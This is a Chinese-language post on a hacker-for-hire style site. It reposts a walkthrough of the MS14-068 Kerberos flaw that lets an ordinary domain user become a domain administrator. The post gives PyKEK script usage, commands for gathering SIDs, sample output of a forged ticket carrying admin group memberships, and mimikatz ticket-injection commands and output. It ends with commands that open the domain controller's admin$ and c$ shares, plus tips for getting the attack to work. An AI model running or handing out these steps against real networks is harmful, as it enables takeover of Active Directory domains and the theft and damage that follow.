找黑客平台

MS14-068 privilege escalation PoC

hacker5年前黑客工具347

  数日前 安全脉搏播报了《MS14-068 Kerberos Domain Privilege Escalation》,安全运维和渗透师必关注的一个漏洞,该漏洞可能允许攻击者提升普通域用户账户为域管理员账户。

  老外在github给出了一个POC,先分享如下:

  

  PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)

  For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .

  More is coming...

  Sylvain Monné

  Contact : sylvain dot monne at solucom dot fr

  http://twitter.com/bidord

  Special thanks to: Benjamin DELPY

  kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions

  kek.ccache: Credential Cache Binary Format (cchache)

  kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC)

  kek.crypto: Kerberos and MS specific cryptographic functions

  Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

  Domain Users (513)

  Domain Admins (512)

  Schema Admins (518)

  Enterprise Admins (519)

  Group Policy Creator Owners (520)

  USAGE:

  ms14-068.py -u @ -s -d

  OPTIONS:

  -p

  --rc4

  Linux (tested with samba and MIT Kerberos)

  On Windows

  SID获取 *** :

  1)wmic useraccount where name="USERNAME" get sid

  2)whoami /all 本机可以直接查出自己的SID;

  胖编想 在未及时patch的内网内是不是要如鱼得水 随意穿插呢?那么内网渗透门槛又被拉低了?

  为不能访问github的小朋友们提供百度盘链接,胖编这么贴心,应该能骗得主编表侄女的欢心了吧,想想就开心,想想就自信。

  Update:

  1) use ms14-068.py

  ms14-068.py -u -s S-1-5-21-3653881884-3918934852-1693569208-8965 -d DC2.secpulse.local

  Password:

  [+] Building AS-REQ for DC2.secpulse.local... Done!

  [+] Sending AS-REQ to DC2.secpulse.local... Done!

  [+] Receiving AS-REP from DC2.secpulse.local... Done!

  [+] Parsing AS-REP from DC2.secpulse.local... Done!

  [+] Building TGS-REQ for DC2.secpulse.local... Done!

  [+] Sending TGS-REQ to DC2.secpulse.local... Done!

  [+] Receiving TGS-REP from DC2.secpulse.local... Done!

  [+] Parsing TGS-REP from DC2.secpulse.local... Done!

  [+] Creating ccache file ''... Done!

  2)put your file into mimikatz directory

  最新版本的mimikatz才支持kerberos::ptc模块,下载地址:

  https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20141120

  否则会出现

  ERROR mimikatz_doLocal ; "ptc" command of "kerberos" module not found !

  3)新版本执行

  mimikatz.exe log "kerberos::ptc " exit

  Using 'mimikatz.log' for logfile : OK

  mimikatz(commandline) # kerberos::ptc

  Principal : (01) : secpulse ; @ SECPULSE.LOCAL

  Data 0

  Start/End/MaxRenew: 2014/12/7 9:43:01 ; 2014/12/7 19:43:01 ; 2014/12/14 9:43:01

  Service Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL

  Target Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL

  Client Name (01) : secpulse ; @ SECPULSE.LOCAL

  Flags 50a10000 : name_canonicalize ; pre_authent ; renewable ; proxiable ; forwardable ;

  Session Key : 0x00000017 - rc4_hmac_nt

  1af2c0401238d0346b5456788atf1140

  Ticket : 0x00000000 - null ; kvno=2 [...]

  * Injecting ticket : OK

  mimikatz(commandline) # exit

  Bye!

  4)如果injecte成功 你有可能获得到了域管理session

  那么klist看一下是否有了kerberos Ticket

  那么 测试一下

  net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败

  dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~

  备注:

  测试环境:

   win7,在xp下mimikatz会出错

   python2.7,使用更高版本比如python3.3脚本会报错

   在本机以local admin登录,如果以域用户登录提权会失败

   如果在以上操作下仍然失败,建议重启主机,并用域管理员在域内新建普通用户,以新建用户的用户名密码执行python脚本,重复以上流程

  

  老外这篇是以local admin(not with AD domain credentials)登陆的,成功获得域控机器权限。

  

  打了patch的暂时就没办法利用啦。

标签: 渗透测试
返回列表

上一篇:SEO管家中心是什么?SEO管家中心功能有哪些?

下一篇:内网渗透 | 手把手教你如何进行内网渗透

相关文章

广告联盟怎么赚钱?如何才能创办网站用广告联盟赚钱?

广告联盟怎么赚钱?如何才能创办网站用广告联盟赚钱?

一、广告联盟+网盘引流、 每个星期都会有各种电影上映,有些人并不想付费或者没时间去看电影就会想找免费的电影资源,这时候就可以用网盘曾热度,比如免费送电影资源,然后把流量分流到导流到你分享出来的网盘上...

黑客攻击苹果就跑的(苹果遭黑客攻击)

黑客攻击苹果就跑的(苹果遭黑客攻击)

本文目录一览: 1、苹果被黑客入侵的表现 2、苹果手机被黑客攻击了怎么办? 3、黑客攻击苹果ID后手机会出现什么? 苹果被黑客入侵的表现 苹果手机被入侵的表现有哪些第一点是手机在你不知情的情...

DNF趣味减压桶答案有哪些 趣味减压桶答案大全

DNF趣味减压桶答案有哪些 趣味减压桶答案大全

DNF趣味减压桶正确答案选择?地下城与勇士近日上线了一个活动叫做趣味减压桶,很多玩家都想知道DNF趣味减压桶答案图案是什么?下面我就给大家带来详细介绍,一起来看看吧! 趣味减压桶答案大全 文字提示...

给网店铺取名大全(264个寓意好名字)

创意两个字给网店肆取名一个字给网店肆名字大全 原纸给网特价店肆   鲜、茼、我   此前给网官方店肆   罪、题、罗   蠹鱼给网旗舰店肆   开、箩、凉   周折给网直销店肆   表、蛋、担...

什么是域名?一级域名按区域主要分为哪几类?

什么是域名?一级域名按区域主要分为哪几类?

什么是域名(一级域名按区域主要分为哪几类?)域名是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)。   网域名称系...

不同阶段的产品经理面试时,如何做自我介绍?

不同阶段的产品经理面试时,如何做自我介绍?

最近这一年面过近百位产品经理,经验背景各不相同,由于工作很忙时间有限,每当遇到自我介绍就开始念简历的产品经理时恨不得赶紧让他走人,简历上都有的内容复述一遍是没有任何意义的。自我介绍是产品经理面试必经的...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.